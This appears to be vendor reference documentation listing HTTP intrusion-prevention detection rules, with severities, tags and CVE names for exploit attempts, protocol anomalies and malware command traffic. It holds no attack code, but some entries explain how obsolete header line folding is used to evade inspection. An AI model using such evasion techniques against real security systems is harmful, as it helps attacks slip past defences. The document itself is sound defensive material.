About this situation: Detects exploit attempts to Citrix Presentation Manager Server ICA Web Client ActiveX control.
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Citrix Presentation Server, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-86-1314
Last changed: sgpkg-ips-325-4219
Vulnerability: HTTP-Citrix-Presentation-Server-Client-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_Client-Boundary-String-Too-Long

About this situation: HTTP client request specified too long multipart boundary delimiter
Context: HTTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-642-5211
Last changed: sgpkg-ips-642-5211
Description: A HTTP client request specified a multipart boundary delimiter that was too long. The request violates the multipart message specification [RFC 2046]. Risk analysis: Risk level is fairly low. Very long boundary delimiters can be used in buffer overflow attacks.
Back to top

HTTP_Client-Content-Disposition-Without-Mandatory-Part

About this situation: Content-Disposition header missing a mandatory part seen in HTTP client request
Context: HTTP without parameters
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: The HTTP client sent a request containing an improperly formatted Content-Disposition header whose value is missing the mandatory "disposition-type" part. The Content-Disposition header is often used with the HTTP protocol to instruct the receiver how to process a message payload, as specified by RFC 6266. Its typical uses include specifying whether the payload should be displayed to the user in a media-specific manner ("inline") or downloaded to a file ("attachment"), as well as specifying a file name to be used when saving the downloaded content as a file. RFC 6266 specifies that the Content-Disposition header must always include a disposition type (typically "inline" or "attachment"). In addition to this, the header is allowed to contain optional parameter-value pairs, for example a "filename" parameter with an associated filename string. An example of a correctly formatted Content-Disposition header would be: Content-Disposition: attachment; filename="myfile.txt" Some HTTP implementations, however, violate the specification by omitting the mandatory disposition type and only including an optional parameter, typically a filename. An example of such an improper form would be: Content-Disposition: filename="myfile.txt" That form, when detected on an HTTP protocol session, would produce this situation. Risk analysis: Risk level is low. There are a number of HTTP implementations in use that exhibit this violation. In many cases there is little or no practical consequence since implementations are advised to default to "attachment" which is often the intended effect when this erroneous form is used.
Back to top

HTTP_Client-Content-Type-Without-Mandatory-Part

About this situation: Content-Type header missing a mandatory part seen in HTTP client request
Context: HTTP without parameters
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: The HTTP client sent a request containing an improperly formatted Content-Type header whose value is missing the mandatory "media-type" part. The Content-Type header is used with the HTTP protocol to inform the receiver about the intended representation of the message payload, as specified by RFC 7231. It conveys information about the type of media contained in the payload as well as optional interpretation instructions, such as the character set used with text-based media. RFC 7231 specifies that the Content-Type header must always include a media type (for example "text/html"). In addition to this, the header is allowed to contain optional parameter-value pairs, for example a "charset" parameter with an associated character set name. An example of a correctly formatted Content-Type header would be: Content-Type: text/html; charset=utf-8 Some HTTP implementations, however, violate the specification by omitting the mandatory media type and only including an optional parameter, typically a character set. An example of such an improper form would be: Content-Type: charset=utf-8 That form, when detected on an HTTP protocol session, would produce this situation. Risk analysis: Risk level is low. There are a number of HTTP implementations in use that exhibit this violation. In many cases there is limited practical consequence since implementations typically use substitutive strategies to obtain a viable representation. In some cases, content may display incorrectly.
Back to top

HTTP_Client-Decompression-Error-Incomplete-Data

About this situation: Incomplete compressed HTTP/1.1 client data
Context: HTTP without parameters
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-1792-5242
Last changed: sgpkg-ips-1792-5242
Description: The end of the compressed data sent by an HTTP/1.1 client was not reached after all data was received.
Back to top

HTTP_Client-Decompression-Error-No-Data

About this situation: Decompression error, no HTTP/1.1 client data decompressed
Context: HTTP without parameters
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-1792-5242
Last changed: sgpkg-ips-1792-5242
Description: There was an error when decompressing data sent by an HTTP/1.1 client and no data could be decompressed. The actual encoding could be different than the encoding indicated by the content-encoding header or the data could have been sent without being encoded at all. The data was fed to file filtering without decompression.
Back to top

HTTP_Client-Decompression-Trailing-Data

About this situation: Trailing data after compressed HTTP/1.1 client data
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1792-5242
Last changed: sgpkg-ips-1792-5242
Description: An HTTP/1.1 client sent some trailing data after it completed sending compressed data.
Back to top

HTTP_Client-Header-Name-Too-Long

About this situation: Client header name too long
Context: HTTP Client Header Name Length Limit
Severity: 8
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-697-5211
Last changed: sgpkg-ips-709-5211
Vulnerability: Avira-Management-Console-Server-HTTP-Header-Processing-Heap-Buffer-Overflow
Description: The HTTP client sent a message header field that was too long. An HTTP header field name was too long from the start of the header up to the colon (:). Risk analysis: Risk level is high. This may be an attempt at overflowing a buffer.
Back to top

HTTP_Client-Header-Name-Unparseable

About this situation: Header with an unparseable name seen in HTTP client request
Context: HTTP without parameters
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: The HTTP client sent a message header field whose name is in an incorrect format. The correct HTTP header name syntax is the name of the header field separated by a colon (:) from the header field value. Incorrect header name syntax is detected when the header name does not end in a colon or contains a character that is not allowed in HTTP header names. Risk analysis: Risk level is medium. A message header field with an incorrect format may be an attempt to feed shell code to the HTTP server. However, incorrect format could be caused by a WWW client that uses non-standard characters in the header field names. Most relevant log fields: "HTTP header" shows the detected header line.
Back to top

HTTP_Client-Header-Value-Unparseable

About this situation: Header with an unparseable value seen in HTTP client request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: The HTTP client sent a message header field whose value is in an incorrect format. This situation is produced when the value of an HTTP protocol header field cannot be parsed by the HTTP inspection module using parsing rules derived from the description of the syntax of the field in question as given by the HTTP specification (RFC 7230 et al). This is a rather generic situation, used when there is no specific situation for the precise sort of excursion from correct syntax that has occurred. Such specific situations are mostly available for conditions that are either known to directly present a threat, or potentially capable of impairing the NGFW engine's ability to inspect and secure the connection; the NGFW is not meant as a general-purpose protocol verifier. If such a specific situation exists, it takes precedence over this situation (i.e. this situation will not be raised, even if the condition was technically consistent with the description of this situation). Risk analysis: Risk level is fairly low. There are a number of HTTP implementations in use that do not strictly follow the HTTP specification in all aspects. As a result, many implementations do not expect perfect compliance, and can perform satisfactorily in the presence of minor protocol anomalies. As explained above, high risk behavior is covered with specialized situations. Most relevant log fields: "HTTP header" shows the detected header line.
Back to top

HTTP_Client-Headers

About this situation: HTTP client headers was seen at the beginning of a connection
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: A HTTP request headers was sent by the client at the beginning of a connection. This situation can be used together with HTTP_Server-Headers to detect if a connection uses HTTP protocol.
Back to top

HTTP_Client-Hostile-Use-of-Header-Line-Folding

About this situation: HTTP client disguised a header critical for inspection using line folding
Context: HTTP without parameters
Severity: 7
Tags: Attack Related Anomalies
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1189-5242
Description: The HTTP client sent a protocol header whose correct parsing is essential for the successful inspection of the message content, using a deprecated practice of line folding in an apparent attempt to interfere with inspection. This situation can be viewed as a more severe special case of the HTTP_Client-Obsolete-Header-Line-Folding situation. It is produced when something looking like a folded instance of a Content-Encoding, Transfer-Encoding, or Content-Length header is detected in the header stream. Seeing this situation is a very likely sign of malicious activity. Line folding, or the practice of extending a header field value over multiple lines by preceding the extra lines with space or tab characters, was defined in the initial version of the HTTP/1.1 specification (RFC 2616) but was deprecated in a later version (RFC 7230) because it creates ambiguities in parsing, thus opening up potential security holes. RFC 7230 not only discourages but strictly forbids the use of header line folding, mandating implementations to treat it as invalid input. A typical attack using line folding usually tries to confuse the protocol inspector about the location of the boundary between the HTTP protocol headers and the message body, or about the content or transfer encodings applied to the message body, in the intention of passing a malicious payload through inspection disguised as a protocol header or a message body encoded with an encoding different from what is apparently indicated. Such an attack takes advantage of the fact that the protocol inspector and the final receiving end are likely to interpret poorly specified protocol features differently, perhaps allowing the receiver to see the disguised payload as content even though the protocol inspector does not. This situation should always be set to terminate the connection. If it is discovered that this situation is occurring in the protected network environment because of the use of an application that is legitimate per se but outdated, updating or decommissioning the application should be considered as the primary remedy. If this situation is set not to terminate, protection against this kind of evasion will be lost and inspection quality against HTTP connections will be generally weakened as the HTTP parser may not be able to follow the protocol flow after being set off track.
Back to top

HTTP_Client-MIME-Parameter-Syntax-Incorrect

About this situation: MIME parameter used incorrect syntax in HTTP client request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-642-5211
Last changed: sgpkg-ips-642-5211
Description: A MIME parameter used incorrect syntax in an HTTP client request. MIME parameter value encoding violated the specification [RFC 2046]. The HTTP inspection module checks only the "boundary" parameter in the Content-Type header field of a MIME multipart message. Risk analysis: Risk level is fairly low. The HTTP inspection module does not have a valid value for the specified MIME parameter, which may affect further analysis.
Back to top

HTTP_Client-Multipart-Delimiter-Use-Invalid

About this situation: Multipart HTTP client request contained invalid characters on line after boundary string
Context: HTTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-642-5211
Last changed: sgpkg-ips-642-5211
Description: A multipart HTTP client request contained invalid characters on the line after the boundary string. These types of lines should not appear in a multipart message. It is uncertain whether this line actually marks a border between two parts or not. Risk analysis: Risk level is fairly low.
Back to top

HTTP_Client-Multipart-No-Valid-Boundary-String

About this situation: No valid boundary string specified for multipart HTTP client request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-642-5211
Last changed: sgpkg-ips-642-5211
Description: No valid boundary string was specified for a multipart HTTP client request. The request will be handled as if it only has one part. Risk analysis: Risk level is fairly low.
Back to top

HTTP_Client-Multipart-Syntax-Error

About this situation: Invalid HTTP client multipart request
Context: HTTP without parameters
Severity: 7
Tags: Protocol Information
First detected in: sgpkg-ips-1776-5242
Last changed: sgpkg-ips-1776-5242
Description: The data sent by an HTTP/1.1 client could not be parsed as a multipart message although according to the HTTP headers the message is expected to be in the multipart format.
Back to top

HTTP_Client-Nested-Multipart-Message

About this situation: Multipart HTTP client request contained another multipart message
Context: HTTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-642-5211
Last changed: sgpkg-ips-642-5211
Description: A multipart HTTP client request contained another multipart message. This is allowed by the specification [RFC 2046] but may lead to a potential buffer overflow. Risk analysis: Risk level is fairly low.
Back to top

HTTP_Client-Obsolete-Header-Line-Folding

About this situation: HTTP client used obsolete header line folding
Context: HTTP without parameters
Severity: 7
Tags: Protocol Information
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: The HTTP client used an obsolete practice of extending a header field value over multiple lines by preceding the extra lines with space or tab characters. This line folding was defined in the initial version of the HTTP/1.1 specification (RFC 2616) but was deprecated in a later version (RFC 7230) because it creates ambiguities in parsing, thus opening up potential security holes. RFC 7230 not only discourages but strictly forbids the use of header line folding, mandating implementations to treat it as invalid input. Seeing this situation is a sign of either the use of an outdated and obsolete application, or malicious activity. A typical attack using line folding usually tries to confuse the protocol inspector about the location of the boundary between the HTTP protocol headers and the message body in the intention of passing a malicious payload through inspection disguised as a header. Such an attack takes advantage of the fact that the protocol inspector and the final receiving end are likely to interpret poorly specified protocol features differently, perhaps allowing the receiver to see the disguised payload as content even though the protocol inspector does not. Because line folding can be used as an attack vector in an attempt to evade security systems and has no legitimate use in modern environments, this situation should always be set to terminate the connection. If it is discovered that this situation is occurring in the protected network environment because of the use of an application that is legitimate per se but outdated, updating or decommissioning the application should be considered as the primary remedy. If this situation is set not to terminate, protection against this kind of evasion will be lost and inspection quality against HTTP connections will be generally weakened as the HTTP parser may not be able to follow the protocol flow after being set off track.
Back to top

HTTP_Client-Syntax-Error

About this situation: Invalid HTTP client request
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: The data sent by the client could not be parsed as a HTTP request. The request may contain a syntax error, or the client may not be using HTTP at all.
Back to top

HTTP_CLR-Atlassian-Confluence-Server-Packageresourcemanager-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Atlassian Confluence Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Confluence, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1189-5242
Vulnerability: Atlassian-Confluence-Server-Packageresourcemanager-Information-Disclosure
Description:
Back to top

HTTP_Connect-Fails-With-Pipelined-Data

About this situation: Pipelined data seen and CONNECT request fails
Context: HTTP without parameters
Severity: 1
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-755-5211
Last changed: sgpkg-ips-755-5211
Description: HTTP client has sent some data after issuing HTTP CONNECT request after that negative response to CONNECT was received.
Back to top

HTTP_Connect-In-HTTP

About this situation: CONNECT not allowed
Context: SSM Context
Severity: 1
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: CONNECT method not configured for this proxy.
Back to top

HTTP_Constraint

About this situation: Header failed constraint
Context: SSM Context
Severity: 1
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Header failed constraint check.
Back to top

HTTP_Content-Disposition

About this situation: Invalid Content-Disposition
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Invalid file name in a Content-Disposition header.
Back to top

HTTP_Content-Encoding-Unsupported

About this situation: Unsupported content encoding in HTTP header field
Context: HTTP without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: An unsupported/unknown content encoding was encountered in HTTP header field. The message content can't be decoded. This might indicate an evasion attempt.
Back to top

HTTP_Content-Range

About this situation: Invalid content range
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Multipart/mimetype contains invalid Content-Range.
Back to top

HTTP_Content-Type

About this situation: Invalid content type
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Multipart/mimetype contains invalid Content-Type.
Back to top

HTTP_Content-Type-Boundary

About this situation: Invalid Content-Type boundary
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Invalid boundary value for a Content-Type of multipart/byteranges.
Back to top

HTTP_Content-Type-Message-RFC822

About this situation: HTTP Response Contains RFC822 Message
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-812-5242
Last changed: sgpkg-ips-812-5242
Description: HTTP response containing RFC822 message was detected. Risk analysis: Risk level is none. Seeing RFC822 message in HTTP response is not a signal of an attack.
Back to top

HTTP_Core-Services-And-OLE-Automation-SubstringData-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft XML Core Services and the Microsoft Object Linking and Embedding Automation library detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, MS2007-08, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-117-2032
Last changed: sgpkg-ips-249-3038
Vulnerability: HTTP-Microsoft-Xml-Core-Services-Memory-Corruption-Vulnerability
HTTP-Microsoft-OLE-Automation-String-Manipulation-Heap-Overflow
Description:
Back to top

HTTP_CRH-Ahsay-Backup-Insecure-File-Upload

About this situation: An attempt to exploit a vulnerability in Ahsay Backup detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ahsay, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1475-5242
Vulnerability: Ahsay-Backup-Insecure-File-Upload
Description:
Back to top

HTTP_CRH-Apache-Httpd-HTTP2-Cache-Digest-Header-Parsing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apache httpd detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2020, Any Operating System not specific, Apache not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1283-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Apache-Httpd-HTTP2-Cache-Digest-Header-Parsing-Memory-Corruption
Description:
Back to top

HTTP_CRH-AutoIt-Compiled-Program-Traffic

About this situation: AutoIt compiled program traffic was detected
Context: HTTP Request Header Line
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1638-5242
Vulnerability: AutoIt-Compiled-Program-Traffic
Description:
Back to top

HTTP_CRH-Cisco-Elastic-Services-Controller-Rest-API-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in Cisco Systems Elastic Services Controller detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems Elastic Services Controller, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1166-5242
Last changed: sgpkg-ips-1720-5242
Vulnerability: Cisco-Elastic-Services-Controller-Rest-API-Authentication-Bypass
Description:
Back to top

HTTP_CRH-Citrix-Path-Traversal-CVE-2019-19781

About this situation: An attempt to exploit a vulnerability in Citrix detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix Gateway, Citrix Application Delivery Controller, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1215-5242
Last changed: sgpkg-ips-1621-5242
Vulnerability: Citrix-Path-Traversal-CVE-2019-19781
Description:
Back to top

HTTP_CRH-Citrix-Path-Traversal-CVE-2019-19781-2

About this situation: An attempt to exploit a vulnerability in Citrix detected
Context: HTTP Request Header Line
Severity: 10
Tags: Any Operating System, Any Hardware, Citrix Gateway, Citrix Application Delivery Controller, CVE2019, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1621-5242
Last changed: sgpkg-ips-1621-5242
Vulnerability: Citrix-Path-Traversal-CVE-2019-19781
Description:
Back to top

HTTP_CRH-Exorcist-C2-Traffic

About this situation: Exorcist C2 traffic was detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1289-5242
Last changed: sgpkg-ips-1638-5242
Vulnerability: Exorcist-C2-Traffic
Description:
Back to top

HTTP_CRH-HTTP_Protocol_Stack_Remote_Code_Execution_Vulnerability_CVE-2021-31166

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, MS2021-05, MS2022-01, CVE2021, CVE2022, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1347-5242
Last changed: sgpkg-ips-1347-5242
Vulnerability: HTTP_Protocol_Stack_Remote_Code_Execution_Vulnerability_CVE-2021-31166
HTTP_Protocol_Stack_Remote_Code_Execution_Vulnerability_CVE-2022-21907
Description:
Back to top

HTTP_CRH-Kinsing-Linux-Trojan-Infection-Traffic

About this situation: Kinsing trojan infection traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1354-5242
Last changed: sgpkg-ips-1354-5242
Vulnerability: Kinsing-Linux-Trojan-Infection-Traffic
Description:
Back to top

HTTP_CRH-Microsoft-Exchange-SSRF-CVE-2021-34473

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Exchange Server, MS2021-07, CVE2021, Windows not specific, Exchange Server not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1381-5242
Last changed: sgpkg-ips-1529-5242
Vulnerability: Microsoft-Exchange-SSRF-CVE-2021-34473
Description:
Back to top

HTTP_CRH-Microsoft-IIS-HTTP-Protocol-Stack-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows 10 detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, MS2022-01, CVE2021, CVE2022, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1528-5242
Vulnerability: Microsoft-IIS-HTTP-Protocol-Stack-Remote-Code-Execution
HTTP_Protocol_Stack_Remote_Code_Execution_Vulnerability_CVE-2022-21907
Description:
Back to top

HTTP_CRH-Ruby-On-Rails-File-Content-Disclosure

About this situation: An attempt to exploit a vulnerability in Ruby On Rails detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ruby on Rails, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1145-5242
Last changed: sgpkg-ips-1528-5242
Vulnerability: Ruby-On-Rails-File-Content-Disclosure
Description:
Back to top

HTTP_CRH-Ruckus-Iot-Controller-Web-UI-Authentication-Bypass-Vulnerability

About this situation: An attempt to exploit a vulnerability in Ruckus IoT Controller detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Ruckus IoT Controller, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1498-5242
Vulnerability: Ruckus-Iot-Controller-Web-UI-Authentication-Bypass-Vulnerability
Description:
Back to top

HTTP_CRH-Squid-Proxy-HTTP-Request-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Squid detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1223-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: Squid-Proxy-HTTP-Request-Processing-Buffer-Overflow
Description:
Back to top

HTTP_CRH-Trend-Micro-Apex-One-And-OfficeScan-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Trend Micro Apex One detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro OfficeScan, Trend Micro Apex One, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1241-5242
Last changed: sgpkg-ips-1528-5242
Vulnerability: Trend-Micro-Apex-One-And-OfficeScan-Directory-Traversal
Description:
Back to top

HTTP_CRH-VLC-Httpd-Connection-Header-Format-String-RCE

About this situation: An attempt to exploit a vulnerability in VLC detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, VideoLAN VLC, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1470-5242
Vulnerability: VLC-Httpd-Connection-Header-Format-String-RCE
Description:
Back to top

HTTP_CRH-Web-Content-Scanner-Activity

About this situation: Web-content scanner activity detected
Context: HTTP Request Header Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Attack Related Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1274-5242
Last changed: sgpkg-ips-1759-5242
Vulnerability: Web-Content-Scanner-Activity
Description:
Back to top

HTTP_CRH-WSHRAT-Malware-Infection-Traffic

About this situation: WSHRAT malware infection traffic detected
Context: HTTP Request Header Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1274-5242
Last changed: sgpkg-ips-1274-5242
Vulnerability: WSHRAT-Malware-Infection-Traffic
Description:
Back to top

HTTP_CRL-3CX-Phone-System-CRM-Integration-SQL-Injection-CVE-2023-49954

About this situation: An attempt to exploit a vulnerability in 3CX Phone System detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, 3CX Phone System, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1667-5242
Last changed: sgpkg-ips-1667-5242
Vulnerability: 3CX-Phone-System-CRM-Integration-SQL-Injection-CVE-2023-49954
Description:
Back to top

HTTP_CRL-ABUS-TVIP-20000-21150-Security-Camera-Command-Injection-CVE-2023-26609

About this situation: An attempt to exploit a vulnerability in ABUS TVIP 20000-21150 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ABUS TVIP, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1658-5242
Last changed: sgpkg-ips-1658-5242
Vulnerability: ABUS-TVIP-20000-21150-Security-Camera-Command-Injection-CVE-2023-26609
Description:
Back to top

HTTP_CRL-Accellion-FTA-oauth_token-Remote-Command-Execution

About this situation: An attempt to exploit an Accellion-FTA-oauth_token-Remote-Command-Execution detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Accellion, CVE2015, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-685-5211
Last changed: sgpkg-ips-1776-5242
Vulnerability: Accellion-FTA-oauth_token-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-ACGVclick-Remote-Code-Injection-Compromise

About this situation: An attempt to exploit a vulnerability in ACGVclick
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ACGVclick, CVE2007, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-343-4219
Vulnerability: ACGVclick-Php-Remote-File-Include-Vulnerability
Description:
Back to top

HTTP_CRL-Acronis-Cyber-Protect-Backup-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Acronis Cyber Protect or Backup detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Linux, Any Hardware, Acronis Cyber Protect or Backup, CVE2022, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1808-5242
Last changed: sgpkg-ips-1808-5242
Vulnerability: Acronis-Cyber-Protect-Backup-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Active-Collab-Remote-PHP-Code-Injection

About this situation: An attempt to exploit an Active Collab Remote PHP Code Injection vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Active Collab, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Vulnerability: Active-Collab-Remote-PHP-Code-Injection
Description:
Back to top

HTTP_CRL-Admentor-Admin-Asp-Vulnerability

About this situation: Attack against vulnerable login script
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Stefan Holmberg Admentor, CVE2002, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-513-5211
Vulnerability: HTTP-Admentor-Admin-Asp-Vulnerability
Description:
Back to top

HTTP_CRL-Adminer-Remote-Arbitrary-File-Read-CVE-2021-43008

